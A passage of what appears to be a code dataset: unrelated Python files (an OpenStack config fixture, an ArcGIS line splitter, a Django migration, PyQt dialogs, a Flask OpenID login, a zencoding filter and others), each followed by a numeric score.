select=('PROJECT', 'timepoint', 'prj_capacity_factor'), param=(mod.prj_max_capacity_factor)) switch_data.load_aug( optional=True, filename=os.path.join(inputs_dir, 'proj_variable_costs.tab'), select=('PROJECT', 'proj_variable_om'), param=(mod.proj_variable_om)) def save_results(model, instance, outdir): """ Export results to standard files. This initial placeholder version is integrating snippets of some of Matthias's code into the main codebase. """ import switch_mod.export as export export.write_table( instance, instance.TIMEPOINTS, output_file=os.path.join("outputs", "dispatch.txt"), headings=("timestamp",)+tuple(instance.PROJECTS), values=lambda m, t: (m.tp_timestamp[t],) + tuple( m.DispatchProj[p, t] if (p, t) in m.PROJ_DISPATCH_POINTS else 0.0 for p in m.PROJECTS ) )
0
# # Copyright 2013 Mirantis, Inc. # Copyright 2013 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import fixtures import six from essential.config import cfg class Config(fixtures.Fixture): """Allows overriding configuration settings for the test. `conf` will be reset on cleanup. """ def __init__(self, conf=cfg.CONF): self.conf = conf def setUp(self): super(Config, self).setUp() # NOTE(morganfainberg): unregister must be added to cleanup before # reset is because cleanup works in reverse order of registered items, # and a reset must occur before unregistering options can occur. self.addCleanup(self._unregister_config_opts) self.addCleanup(self.conf.reset) self._registered_config_opts = {} def config(self, **kw): """Override configuration values. The keyword arguments are the names of configuration options to override and their values. If a `group` argument is supplied, the overrides are applied to the specified configuration option group, otherwise the overrides are applied to the ``default`` group. """ group = kw.pop('group', None) for k, v in six.iteritems(kw): self.conf.set_override(k, v, group) def _unregister_config_opts(self): for group in self._registered_config_opts: self.conf.unregister_opts(self._registered_config_opts[group], group=group) def register_opt(self, opt, group=None): """Register a single option for the test run. Options registered in this manner will automatically be unregistered during cleanup. If a `group` argument is supplied, it will register the new option to that group, otherwise the option is registered to the ``default`` group. """ self.conf.register_opt(opt, group=group) self._registered_config_opts.setdefault(group, set()).add(opt) def register_opts(self, opts, group=None): """Register multiple options for the test run. This works in the same manner as register_opt() but takes a list of options as the first argument. All arguments will be registered to the same group if the ``group`` argument is supplied, otherwise all options will be registered to the ``default`` group. """ for opt in opts: self.register_opt(opt, group=group)
0
# ============================================================================== # Copyright (C) 2011 Diego Duclos # Copyright (C) 2011-2018 Anton Vorobyov # # This file is part of Eos. # # Eos is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Eos is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with Eos. If not, see <http://www.gnu.org/licenses/>. # ============================================================================== from eos.const.eve import AttrId from eos.const.eve import EffectId from eos.eve_obj.effect import EffectFactory from eos.stats_container import DmgStats from .base import DmgDealerEffect class EmpWave(DmgDealerEffect): def get_volley(self, item): em = item.attrs.get(AttrId.em_dmg, 0) therm = item.attrs.get(AttrId.therm_dmg, 0) kin = item.attrs.get(AttrId.kin_dmg, 0) expl = item.attrs.get(AttrId.expl_dmg, 0) return DmgStats(em, therm, kin, expl) def get_applied_volley(self, item, tgt_data): raise NotImplementedError EffectFactory.register_class_by_id( EmpWave, EffectId.emp_wave)
0
####################################################################### # SplitLineModule # # Purpose: Split line at points spaced at regular intervals # # Created by: Cara Walter # # Includes code modified from OSU GEO 599: https://dl.dropbox.com/u/37858409/Geo599_GIS_Programming/index.html # http://stackoverflow.com/questions/3579568/choosing-a-file-in-python-simple-gui # # Input: # TheInFile: the name of a polyline feature class with 1 continuous line (as long as line is continuous, tool will run) # TheOutFilePath: the path of the folder to put the output shapefiles in # SplitLength: number specifying interval at which to split input line # AsArcGISTool: binary specifying if running as a GIS tool (1) or not (0) to control messaging # FlipLine: binary specifying whether the start of the centerline aligns with the desired start (0), and it actually the end (1) # # Outputs (name same as input shapefile with suffix): # _single.shp (PolylineSingle): shapefile with polylines merged if input had more than one polyline # _random_points.shp (PointName): points along input polyline at specified spacing # _copy_points.shp (PointNameCopy): two sets of points along input polyline at specified spacing # _segmented_line.shp (LineSegmented): the output split polylines # # Returns: _segmented_line.shp (LineSegmented): the output split polylines path and name - contains "Station" field with distance from line start # # Process: # 1) Check to see if polyline contains single, continous feature - try to fix if not # 2) Create evenly spaced points along the line # 2) Duplicate the points and append original points to duplicate points shapefile to create # start and end points for each line segment # 3) Use points to line tool to create segmented line (use CID field as unique line identifier) # 4) Add distance from start to attribute table in "Station" field # # arcpy.management.SplitLineAtPoint supposedly does some of this, but it is unreliable for lots of splits # # Modified: 3/18/2013 ####################################################################### def SplitLine(TheInFile,TheOutFilePath,SplitLength,AsArcGISTool,FlipLine): try: import os import ManagementInterface as MgmtGIS import ShapefileProperties as ShpProp from MessagingModule import MessageSwitch '''Setup classes and file output''' #Create instance of management class MgmtInterface=MgmtGIS.ManagementInterface() # Extract just the file name TheFileName=os.path.basename(TheInFile) # check to see if out folder exists, if not create it if os.path.isdir(TheOutFilePath)!= True: os.mkdir(TheOutFilePath) '''Check to see if more than 1 feature, try to combine as 1 continuous, if that fails abort''' # Determine how many input line features there are NumFeatures=MgmtInterface.CountRows(TheInFile) #Merge input line into 1 feature if multiple features or # rename previous variable to match new name if NumFeatures>1: PolylineSingle=TheOutFilePath+TheFileName[0:-4]+"_single.shp" # Merge lines only if they will be single part and therefore continuous MgmtInterface.Dissolve(TheInFile,PolylineSingle,"#","#", "SINGLE_PART","UNSPLIT_LINES") else: PolylineSingle=TheInFile # Count features again to make sure input line is continuous NumFeaturesSingle=MgmtInterface.CountRows(PolylineSingle) # Create error to exit out if input line still more than 1 feature if NumFeaturesSingle>1: message="Error: Input line is more than 1 feature and not continuous" MessageSwitch(message,AsArcGISTool) x=1/0 '''Create evenly spaced points along input polyline at SplitLength distance''' # Update user on process message="Creating evenly spaced points along\n "+TheFileName+" \nat "+ format(SplitLength) +" interval..." MessageSwitch(AsArcGISTool,message) #Determine input line length LineLength=ShpProp.Length(PolylineSingle) # Determine number of points from line split lengths PointNumber=(int(int(LineLength[0]+1)/SplitLength)) # Output point shapefile name PointName=TheFileName[0:-4]+"_random_points.shp" # Use split length and number of point to constrain point creation along input line MgmtInterface.RandomPts( TheOutFilePath,PointName,PolylineSingle,"",PointNumber,SplitLength,"POINT","") ''' Setting up for Point to Line tool: need 2 points per line and a field to base line creation on - using CID with original points FID as unique line identifier''' # Update user on process message="Creating duplicate points as end points for segmented lines..." MessageSwitch(AsArcGISTool,message) #Write FID values to CID field as identifier for line segments if FlipLine==0: # Centerline start is at desired output line start MgmtInterface.WriteField(TheOutFilePath+PointName,"CID","[FID]","VB") else: # Centerline start is at end of desired output line MgmtInterface.WriteField(TheOutFilePath+PointName,"CID", format(PointNumber-1)+"-[FID]","VB") # Select all but the first point and copy to new shapefile - # duplicate points will be end points for each line segment # Create feature layer MgmtInterface.CreateLayer(TheOutFilePath+PointName,"Point_layer") # Define selection SQLstatement="\"CID\" <> 0" #Run select tool to a get new selection of all points with a CID not equal to 0 MgmtInterface.SelectUsingAttributes("Point_layer","NEW_SELECTION",SQLstatement) #Output shapefile name PointNameCopy=TheOutFilePath+TheFileName[0:-4]+"_copy_points.shp" #Run copy tool through class MgmtInterface.CopyFeatures("Point_layer",PointNameCopy) #Subtract 1 from CID value to treat duplicate points as "end" for each segment MgmtInterface.WriteField(PointNameCopy,"CID","[CID] - 1","VB") '''Combine original and duplicate points to create new lines''' # Update user on process message="Combining original and duplicate points..." MessageSwitch(AsArcGISTool,message) # Append original points to copy except for last point # (don't need 2 last points as do not need 1 to be start point) # Run select tool through class to exclude last point SQLstatement2="\"CID\" <> "+format(PointNumber-1) MgmtInterface.SelectUsingAttributes("Point_layer","NEW_SELECTION",SQLstatement2) # append original to copy MgmtInterface.Append("Point_layer",PointNameCopy) '''Create line segments from points and add station (distance from start) to attribute table''' # Update user on process message="Creating line segments from points..." MessageSwitch(AsArcGISTool,message) #Split line name LineSegmented=TheOutFilePath+TheFileName[0:-4]+"_segmented_line.shp" # Create segmented line from points using CID as line identifier MgmtInterface.Points2Line(PointNameCopy,LineSegmented,"CID","#") # Add stationing to attribute table MgmtInterface.AddField(LineSegmented,"Station","DOUBLE",10,2,"#") MgmtInterface.WriteField(LineSegmented,"Station","!shape.length! * !CID!","PYTHON") # Clean up feature layer MgmtInterface.Delete("Point_layer") # Update user on process message="Split Line completed." MessageSwitch(AsArcGISTool,message) return(LineSegmented) #Print out error from Python except Exception as TheError: raise RuntimeError("An error has occurred: "+format(TheError))
0.037523
# -*- coding: utf-8 -*- # Generated by Django 1.11.6 on 2017-11-16 20:50 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('api', '0020_auto_20171102_1457'), ] operations = [ migrations.RemoveField( model_name='fuelsupplierattachmenttag', name='create_user', ), migrations.RemoveField( model_name='fuelsupplierattachmenttag', name='fuelSupplierAttachmentFK', ), migrations.RemoveField( model_name='fuelsupplierattachmenttag', name='update_user', ), migrations.RemoveField( model_name='fuelsupplierccdata', name='create_user', ), migrations.RemoveField( model_name='fuelsupplierccdata', name='fuelSupplierFK', ), migrations.RemoveField( model_name='fuelsupplierccdata', name='update_user', ), migrations.RemoveField( model_name='fuelsuppliercontact', name='create_user', ), migrations.RemoveField( model_name='fuelsuppliercontact', name='fuelSupplierFK', ), migrations.RemoveField( model_name='fuelsuppliercontact', name='update_user', ), migrations.RemoveField( model_name='fuelsuppliercontact', name='userFK', ), migrations.RemoveField( model_name='notification', name='create_user', ), migrations.RemoveField( model_name='notification', name='notificationEventFK', ), migrations.RemoveField( model_name='notification', name='update_user', ), migrations.RemoveField( model_name='notification', name='userFK', ), migrations.RemoveField( model_name='notificationevent', name='create_user', ), migrations.RemoveField( model_name='notificationevent', name='creditTradeFK', ), migrations.RemoveField( model_name='notificationevent', name='update_user', ), migrations.RemoveField( model_name='notificationtype', name='create_user', ), migrations.RemoveField( model_name='notificationtype', name='update_user', ), migrations.RenameField( model_name='credittradestatus', old_name='expirationDate', new_name='expiration_date', ), migrations.RenameField( model_name='credittradetype', old_name='expirationDate', new_name='expiration_date', ), migrations.RenameField( model_name='credittradezeroreason', old_name='expirationDate', new_name='expiration_date', ), migrations.RenameField( model_name='fuelsupplieractionstype', old_name='expirationDate', new_name='expiration_date', ), migrations.RenameField( model_name='fuelsupplierbalance', old_name='endDate', new_name='expiration_date', ), migrations.RenameField( model_name='fuelsupplierstatus', old_name='expirationDate', new_name='expiration_date', ), migrations.DeleteModel( name='FuelSupplierAttachmentTag', ), migrations.DeleteModel( name='FuelSupplierCCData', ), migrations.DeleteModel( name='FuelSupplierContact', ), migrations.DeleteModel( name='Notification', ), migrations.DeleteModel( name='NotificationEvent', ), migrations.DeleteModel( name='NotificationType', ), ]
0
#===================================================================================================================================== #Copyright #===================================================================================================================================== #Copyright (C) 2014 Alexander Blaessle, Patrick Mueller and the Friedrich Miescher Laboratory of the Max Planck Society #This software is distributed under the terms of the GNU General Public License. #This file is part of PyFRAP. #PyFRAP is free software: you can redistribute it and/or modify #it under the terms of the GNU General Public License as published by #the Free Software Foundation, either version 3 of the License, or #(at your option) any later version. #This program is distributed in the hope that it will be useful, #but WITHOUT ANY WARRANTY; without even the implied warranty of #MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #GNU General Public License for more details. #You should have received a copy of the GNU General Public License #along with this program. If not, see <http://www.gnu.org/licenses/>. #=========================================================================================================================================================================== #Module Description #=========================================================================================================================================================================== #Module containing basic custom PyQT classes: #1) basicCanvasDialog #=========================================================================================================================================================================== #Importing necessary modules #=========================================================================================================================================================================== #Misc import sys import time import os, os.path #PyFRAP modules from pyfrp.modules.pyfrp_term_module import * #PyQT from PyQt4 import QtGui, QtCore #matplotlib import matplotlib.pyplot as plt import matplotlib from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas """ Apparently the NavigationToolbar naming has changed in newer matplotlib versions, thus we need to test out some cases. """ try: from matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar except ImportError: try: from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar except ImportError: printWarning("Cannot import NavigationToolbar.") from matplotlib.figure import Figure #=================================================================================================================================== #Basic Dialog with space for QLEs/Btns on left hand side and canvas on right hand side #=================================================================================================================================== class basicCanvasDialog(QtGui.QDialog): def __init__(self,parent,xlim=[0,512],ylim=[0,512]): super(basicCanvasDialog,self).__init__(parent) self.dpi = 100 self.setMinimumSize(1000,500) self.resize(1300,500) #------------------------------------------------------------------------------------------------------------------- #Bookkeeping variables #------------------------------------------------------------------------------------------------------------------- self.artists=[] #------------------------------------------------------------------------------------------------------------------- #Buttons #------------------------------------------------------------------------------------------------------------------- #Done button self.btnDone=QtGui.QPushButton('Done') self.btnDone.connect(self.btnDone, QtCore.SIGNAL('clicked()'), self.donePressed) #------------------------------------------------------------------------------------------------------------------- #Plot frame #------------------------------------------------------------------------------------------------------------------- self.plotFrame = QtGui.QWidget() self.plotFrame.setMaximumWidth(1) #------------------------------------------------------------------------------------------------------------------- #Layout #------------------------------------------------------------------------------------------------------------------- self.grid = QtGui.QGridLayout() self.grid.setColumnMinimumWidth(2,200) #------------------------------------------------------------------------------------------------------------------- #Create Canvas #------------------------------------------------------------------------------------------------------------------- self.createCanvas(xlim=xlim,ylim=ylim) #------------------------------------------------------------------------------------------------------------------- #Final Layout #------------------------------------------------------------------------------------------------------------------- self.vbox = QtGui.QVBoxLayout() self.vbox.addWidget(self.canvas) self.vbox.addWidget(self.btnDone) #Add everything to Horizontal Box self.hbox = QtGui.QHBoxLayout() self.hbox.addLayout(self.grid) self.hbox.addLayout(self.vbox) self.setLayout(self.hbox) self.setWindowTitle('basicCanvasDialog') self.show() def createCanvas(self,xlim=None,ylim=None): h=500/self.dpi v=500/self.dpi self.fig = Figure( dpi=self.dpi) self.fig.set_size_inches(h,v,forward=True) self.canvas = FigureCanvas(self.fig) self.canvas.setParent(self.plotFrame) self.ax = self.fig.add_subplot(111) if xlim!=None: self.ax.set_xlim(xlim) if ylim!=None: self.ax.set_ylim(ylim) self.canvas.draw() #self.plotFrame.adjustSize() return def showImg(self,img): self.ax.imshow(img) self.ax.set_xlim([1,img.shape[0]]) self.ax.set_ylim([1,img.shape[1]]) self.canvas.draw() return self.canvas def connectCanvas(self): self.canvas.mpl_connect('button_press_event', self.getMouseCanvas) self.canvas.mpl_connect('key_press_event', self.keyPressed) self.canvas.setFocusPolicy( QtCore.Qt.ClickFocus ) self.canvas.setFocus() def keyPressed(self): printWarning("No Key-Press Action defined.") def removeArtist(self,idx=-1): if len(self.artists)>0: self.artists[idx].remove() self.artists.pop(idx) self.canvas.draw() return self.artists def replaceArtist(self,idx,newArtist): if len(self.artists)>idx: self.removeArtist(idx=idx) self.artists.insert(idx,newArtist) self.canvas.draw() else: self.artists.append(newArtist) return self.artists def setArtistColor(self,color): for artist in self.artists: artist.set_color(color) self.canvas.draw() return self.artists def donePressed(self): self.done(1) return #=================================================================================================================================== #Basic Dialog for settings of any kind. #=================================================================================================================================== class basicSettingsDialog(QtGui.QDialog): def __init__(self,parent): super(basicSettingsDialog,self).__init__(parent) self.setMinimumSize(500,500) self.resize(700,500) #------------------------------------------------------------------------------------------------------------------- #Buttons #------------------------------------------------------------------------------------------------------------------- #Done button self.btnDone=QtGui.QPushButton('Done') self.btnDone.connect(self.btnDone, QtCore.SIGNAL('clicked()'), self.donePressed) #------------------------------------------------------------------------------------------------------------------- #Layout #------------------------------------------------------------------------------------------------------------------- self.grid = QtGui.QGridLayout() self.grid.setColumnMinimumWidth(2,20) #------------------------------------------------------------------------------------------------------------------- #Validators #------------------------------------------------------------------------------------------------------------------- self.doubleValid=QtGui.QDoubleValidator() self.intValid=QtGui.QIntValidator() #------------------------------------------------------------------------------------------------------------------- #Final Layout #------------------------------------------------------------------------------------------------------------------- self.vbox = QtGui.QVBoxLayout() self.vbox.addLayout(self.grid) self.hbox = QtGui.QHBoxLayout() self.hbox.addWidget(self.btnDone,stretch=0,alignment=QtCore.Qt.AlignRight) self.vbox.addLayout(self.hbox) self.setLayout(self.vbox) self.setWindowTitle('basicSettingsDialog') def donePressed(self): self.done(1) return #=================================================================================================================================== #Basic Selector for a single item out of a list #=================================================================================================================================== class basicSelectorDialog(QtGui.QDialog): def __init__(self,List,parent): super(basicSelectorDialog,self).__init__(parent) self.item=None self.List=List #Done button self.btnDone=QtGui.QPushButton('Done') self.btnDone.connect(self.btnDone, QtCore.SIGNAL('clicked()'), self.donePressed) #QTreeWidget self.ListWidget=QtGui.QTreeWidget() self.ListWidget.setColumnWidth(0,100) self.ListWidget.itemClicked.connect(self.itemClicked) self.updateList() #Layout self.vbox = QtGui.QVBoxLayout() self.vbox.addWidget(self.ListWidget) self.hbox = QtGui.QHBoxLayout() self.hbox.addWidget(self.btnDone,stretch=0,alignment=QtCore.Qt.AlignRight) self.vbox.addLayout(self.hbox) self.setLayout(self.vbox) self.setWindowTitle('basicSelectorDialog') self.show() def updateList(self): self.ListWidget.clear() for r in self.List: QtGui.QTreeWidgetItem(self.ListWidget,[r]) return def itemClicked(self): idx=self.ListWidget.indexFromItem(self.ListWidget.currentItem()).row() self.item=self.List[idx] def getItem(self): return self.item def donePressed(self): self.done(1) return #=================================================================================================================================== #Basic Selector for a list of items out of a list #=================================================================================================================================== class listSelectorDialog(QtGui.QDialog): def __init__(self,parent,List,leftTitle="",rightTitle="",itemsRight=[]): super(listSelectorDialog,self).__init__(parent) #print type(self), type(parent) #QtGui.QDialog.__init__() self.itemsRight=itemsRight self.itemsLeft=list(List) self.List=List #Buttons self.btnAdd=QtGui.QToolButton() self.btnAdd.connect(self.btnAdd, QtCore.SIGNAL('clicked()'), self.addItem) self.btnAdd.setArrowType(QtCore.Qt.RightArrow) self.btnRemove=QtGui.QToolButton() self.btnRemove.connect(self.btnRemove, QtCore.SIGNAL('clicked()'), self.removeItem) self.btnRemove.setArrowType(QtCore.Qt.LeftArrow) self.btnDone=QtGui.QPushButton('Done') self.btnDone.connect(self.btnDone, QtCore.SIGNAL('clicked()'), self.donePressed) #Left QtreeWidgetItem self.leftList=QtGui.QTreeWidget() self.leftList.setHeaderLabels([leftTitle]) self.leftList.setColumnWidth(0,200) self.leftList.setColumnWidth(1,75) self.leftList.itemDoubleClicked.connect(self.addItem) #right QtreeWidgetItem self.rightList=QtGui.QTreeWidget() self.rightList.setHeaderLabels([rightTitle]) self.rightList.setColumnWidth(0,200) self.rightList.setColumnWidth(1,75) self.rightList.itemDoubleClicked.connect(self.removeItem) #Layout self.vbox = QtGui.QVBoxLayout() self.vbox.addWidget(self.btnAdd) self.vbox.addWidget(self.btnRemove) self.hbox = QtGui.QHBoxLayout() self.hbox.addWidget(self.leftList) self.hbox.addLayout(self.vbox) self.hbox.addWidget(self.rightList) self.vbox2 = QtGui.QVBoxLayout() self.vbox2.addLayout(self.hbox) self.vbox2.addWidget(self.btnDone) #Init lists self.initLeftList() self.initRightList() self.resize(400,500) self.setLayout(self.vbox2) self.setWindowTitle("list Selector Dialog") self.show() def getListDifference(self): for item in self.itemsLeft: if item in self.itemsRight: self.itemsLeft.remove(item) return self.itemsLeft def initLeftList(self): self.getListDifference() for item in self.itemsLeft: QtGui.QTreeWidgetItem(self.leftList,[item]) def initRightList(self): for item in self.itemsRight: QtGui.QTreeWidgetItem(self.rightList,[item]) def addItem(self): #Determine selected item self.currentItem=str(self.leftList.currentItem().data(0,0).toString()) #Insert new node in right list newNode=QtGui.QTreeWidgetItem(self.rightList,[self.currentItem]) #Remove node in left list self.currLeftInd=self.leftList.indexFromItem(self.leftList.currentItem()).row() self.leftList.takeTopLevelItem(self.currLeftInd) self.itemsRight.append(self.currentItem) self.itemsLeft.remove(self.currentItem) def removeItem(self): #Determine selected item self.currentItem=str(self.rightList.currentItem().data(0,0).toString()) #Insert new node in left list newNode=QtGui.QTreeWidgetItem(self.leftList,[self.currentItem]) #Remove node in right list self.currRightInd=self.rightList.indexFromItem(self.rightList.currentItem()).row() self.rightList.takeTopLevelItem(self.currRightInd) self.itemsRight.remove(self.currentItem) self.itemsLeft.append(self.currentItem) def getSelection(self): return self.itemsRight def donePressed(self): self.done(1) return #=================================================================================================================================== #Basic Selector for a list of items out of a list #=================================================================================================================================== class advancedListSelectorDialog(listSelectorDialog): def __init__(self,parent,List,leftTitle="",rightTitle="",itemsRight=[]): super(advancedListSelectorDialog,self).__init__(parent,List,leftTitle=leftTitle,rightTitle=rightTitle) #print type(self),type(parent) #raw_input() #listSelectorDialog.__init__(parent,List,leftTitle=leftTitle,rightTitle=rightTitle,itemsRight=itemsRight) self.btnUp=QtGui.QToolButton() self.btnUp.connect(self.btnUp, QtCore.SIGNAL('clicked()'), self.upItem) self.btnUp.setArrowType(QtCore.Qt.UpArrow) self.btnDown=QtGui.QToolButton() self.btnDown.connect(self.btnDown, QtCore.SIGNAL('clicked()'), self.downItem) self.btnDown.setArrowType(QtCore.Qt.DownArrow) self.vbox.addWidget(self.btnUp) self.vbox.addWidget(self.btnDown) self.setWindowTitle("advanced List Selector Dialog") def upItem(self): #Determine selected item self.currentItem=str(self.rightList.currentItem().data(0,0).toString()) #Determine index in sel prop list ind=self.itemsRight.index(self.currentItem) #Swap in list if ind>0: self.itemsRight[ind-1], self.itemsRight[ind] = self.itemsRight[ind], self.itemsRight[ind-1] #Clear list and recreate it self.rightList.clear() self.initRightList() self.currentRightItem=self.rightList.topLevelItem(ind-1) self.rightList.setCurrentItem(self.currentRightItem) def downItem(self): #Determine selected item self.currentItem=str(self.rightList.currentItem().data(0,0).toString()) #Determine index in sel prop list ind=self.itemsRight.index(self.currentItem) #Swap in list if ind<len(self.itemsRight)-1: self.itemsRight[ind+1], self.itemsRight[ind] = self.itemsRight[ind], self.itemsRight[ind+1] #Clear list and recreate it self.rightList.clear() self.initRightList() self.currentRightItem=self.rightList.topLevelItem(ind+1) self.rightList.setCurrentItem(self.currentRightItem) #=================================================================================================================================== #Basic Progress Dialog #=================================================================================================================================== class progressDialog(QtGui.QDialog): def __init__(self,parent): super(progressDialog,self).__init__(parent) #Labels self.lblName = QtGui.QLabel("Something in progress...", self) #Buttons self.btnCancel=QtGui.QPushButton('Cancel') self.btnCancel.connect(self.btnCancel, QtCore.SIGNAL('clicked()'), self.cancel) #ProgressBar self.progressbar = QtGui.QProgressBar() self.progressbar.setMinimum(1) self.progressbar.setMaximum(100) #Layout self.vbox = QtGui.QVBoxLayout() self.vbox.addWidget(self.lblName) self.vbox.addWidget(self.progressbar) self.vbox.addWidget(self.btnCancel) self.setLayout(self.vbox) self.setWindowTitle('Progress Dialog') self.show() def cancel(self): self.accepted.emit() #=================================================================================================================================== #Basic PyFRAP Thread #=================================================================================================================================== #Simple worker class class pyfrpWorker(QtCore.QObject): taskFinished = QtCore.pyqtSignal() start = QtCore.pyqtSignal() def __init__(self, function, *args, **kwargs): super(pyfrpWorker, self).__init__() self.function = function self.args = args self.kwargs = kwargs self.start.connect(self.run) #@QtCore.pyqtSlot() (Interesting: the pyqtslot decorator seems to block the start signal...) def run(self): self.function(*self.args, **self.kwargs) self.taskFinished.emit() class pyfrpThread(QtCore.QThread): progressSignal = QtCore.pyqtSignal(int) def __init__(self, parent=None): QtCore.QThread.__init__(self) def __del__(self): self.wait() #=================================================================================================================================== #Basic Wait Dialog #=================================================================================================================================== class waitDialog(QtGui.QDialog): def __init__(self,parent): super(waitDialog,self).__init__(parent) #Labels self.lblName = QtGui.QLabel("Something in progress...", self) #Buttons self.btnCancel=QtGui.QPushButton('Cancel') self.btnCancel.connect(self.btnCancel, QtCore.SIGNAL('clicked()'), self.cancel) #Layout self.vbox = QtGui.QVBoxLayout() self.vbox.addWidget(self.lblName) self.vbox.addWidget(self.btnCancel) self.setLayout(self.vbox) self.setWindowTitle('Progress Dialog') self.show() def cancel(self): self.accepted.emit()
0.050905
# Standard library from urllib.parse import quote, unquote # Packages import flask import flask_openid import talisker.requests from pymacaroons import Macaroon # Local from webapp.macaroons import ( binary_serialize_macaroons, MacaroonRequest, MacaroonResponse, ) open_id = flask_openid.OpenID( stateless=True, safe_roots=[], extension_responses=[MacaroonResponse] ) session = talisker.requests.get_session() def user_info(user_session): """ Checks if the user is authenticated from the session Returns True if the user is authenticated """ if "openid" in user_session and "authentication_token" in user_session: return { "fullname": user_session["openid"]["fullname"], "email": user_session["openid"]["email"], "authentication_token": user_session["authentication_token"], } else: return None def empty_session(user_session): """ Remove items from session """ user_session.pop("macaroon_root", None) user_session.pop("authentication_token", None) user_session.pop("openid", None) @open_id.loginhandler def login_handler(): is_test_backend = flask.request.args.get("test_backend", False) api_url = flask.current_app.config["CONTRACTS_LIVE_API_URL"] if is_test_backend: api_url = flask.current_app.config["CONTRACTS_TEST_API_URL"] if user_info(flask.session): return flask.redirect(open_id.get_next_url()) response = session.request( method="get", url=f"{api_url}/v1/canonical-sso-macaroon" ) flask.session["macaroon_root"] = response.json()["macaroon"] for caveat in Macaroon.deserialize( flask.session["macaroon_root"] ).third_party_caveats(): if caveat.location == "login.ubuntu.com": openid_macaroon = MacaroonRequest(caveat_id=caveat.caveat_id) break return open_id.try_login( flask.current_app.config["CANONICAL_LOGIN_URL"], ask_for=["email", "nickname", "image"], ask_for_optional=["fullname"], extensions=[openid_macaroon], ) @open_id.after_login def after_login(resp): root = Macaroon.deserialize(flask.session.pop("macaroon_root")) bound = root.prepare_for_request( Macaroon.deserialize(resp.extensions["macaroon"].discharge) ) flask.session["authentication_token"] = binary_serialize_macaroons( [root, bound] ).decode("utf-8") if not resp.nickname: return flask.redirect(flask.current_app.config["CANONICAL_LOGIN_URL"]) flask.session["openid"] = { "identity_url": resp.identity_url, "nickname": resp.nickname, "fullname": resp.fullname, "image": resp.image, "email": resp.email, } return flask.redirect(open_id.get_next_url()) def logout(): return_to = flask.request.args.get("return_to") or flask.request.url_root # Make sure return_to is URL encoded if return_to == unquote(return_to): return_to = quote(return_to, safe="") empty_session(flask.session) login_url = flask.current_app.config["CANONICAL_LOGIN_URL"] return flask.redirect( f"{login_url}/+logout?return_to={return_to}&return_now=True" )
0
# Create the quick lookup protein features # table by combining annotation from other # resources into a single table. import Config import sys, string import MySQLdb import Database from classes import Quick with Database.db as cursor : quick = Quick.Quick( Database.db, cursor ) cursor.execute( "TRUNCATE TABLE " + Config.DB_QUICK + ".quick_uniprot_features" ) Database.db.commit( ) cursor.execute( "SELECT * FROM " + Config.DB_NAME + ".uniprot_features" ) recordSize = 8 # Number of Columns in quick_protein_features table sqlFormat = ",".join( ['%s'] * recordSize ) query = "INSERT INTO " + Config.DB_QUICK + ".quick_uniprot_features VALUES (%s)" % sqlFormat insertCount = 0 for row in cursor.fetchall( ) : record = [row[0], row[1], row[2], row[3], row[4], row[5], row[6]] proteinID = str(row[9]) if proteinID : cursor.execute( query, tuple(record + [proteinID]) ) cursor.execute( "INSERT INTO " + Config.DB_STATS + ".update_tracker VALUES ( '0', 'QUICK_buildUniprotFeatures', NOW( ) )" ) Database.db.commit( ) sys.exit( )
0.051259
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Generic formatting filter: creates proper indentation for each tree node, placing "%s" placeholder where the actual output should be. You can use this filter to preformat tree and then replace %s placeholder to whatever you need. This filter should't be called directly from editor as a part of abbreviation. @author Sergey Chikuyonok (serge.che@gmail.com) @link http://chikuyonok.ru """ import re from zencoding import zen_core as zen_coding alias = '_format' "Filter name alias (if not defined, ZC will use module name)" child_token = '${child}' placeholder = '%s' def get_newline(): return zen_coding.get_newline() def get_indentation(): return zen_coding.get_indentation() def has_block_sibling(item): """ Test if passed node has block-level sibling element @type item: ZenNode @return: bool """ return item.parent and item.parent.has_block_children() def is_very_first_child(item): """ Test if passed itrem is very first child of the whole tree @type tree: ZenNode """ return item.parent and not item.parent.parent and not item.previous_sibling def should_break_line(node, profile): """ Need to add line break before element @type node: ZenNode @type profile: dict @return: bool """ if not profile['inline_break']: return False # find toppest non-inline sibling while node.previous_sibling and node.previous_sibling.is_inline(): node = node.previous_sibling if not node.is_inline(): return False # calculate how many inline siblings we have node_count = 1 node = node.next_sibling while node: if node.is_inline(): node_count += 1 else: break node = node.next_sibling return node_count >= profile['inline_break'] def should_break_child(node, profile): """ Need to add newline because <code>item</code> has too many inline children @type node: ZenNode @type profile: dict @return: bool """ # we need to test only one child element, because # has_block_children() method will do the rest return node.children and should_break_line(node.children[0], profile) def process_snippet(item, profile, level=0): """ Processes element with <code>snippet</code> type @type item: ZenNode @type profile: dict @param level: Depth level @type level: int """ data = item.source.value; if not data: # snippet wasn't found, process it as tag return process_tag(item, profile, level) item.start = placeholder item.end = placeholder padding = item.parent.padding if item.parent else get_indentation() * level if not is_very_first_child(item): item.start = get_newline() + padding + item.start # adjust item formatting according to last line of <code>start</code> property parts = data.split(child_token) lines = zen_coding.split_by_lines(parts[0] or '') padding_delta = get_indentation() if len(lines) > 1: m = re.match(r'^(\s+)', lines[-1]) if m: padding_delta = m.group(1) item.padding = padding + padding_delta return item def process_tag(item, profile, level=0): """ Processes element with <code>tag</code> type @type item: ZenNode @type profile: dict @param level: Depth level @type level: int """ if not item.name: # looks like it's a root element return item item.start = placeholder item.end = placeholder is_unary = item.is_unary() and not item.children # formatting output if profile['tag_nl'] is not False: padding = item.parent.padding if item.parent else get_indentation() * level force_nl = 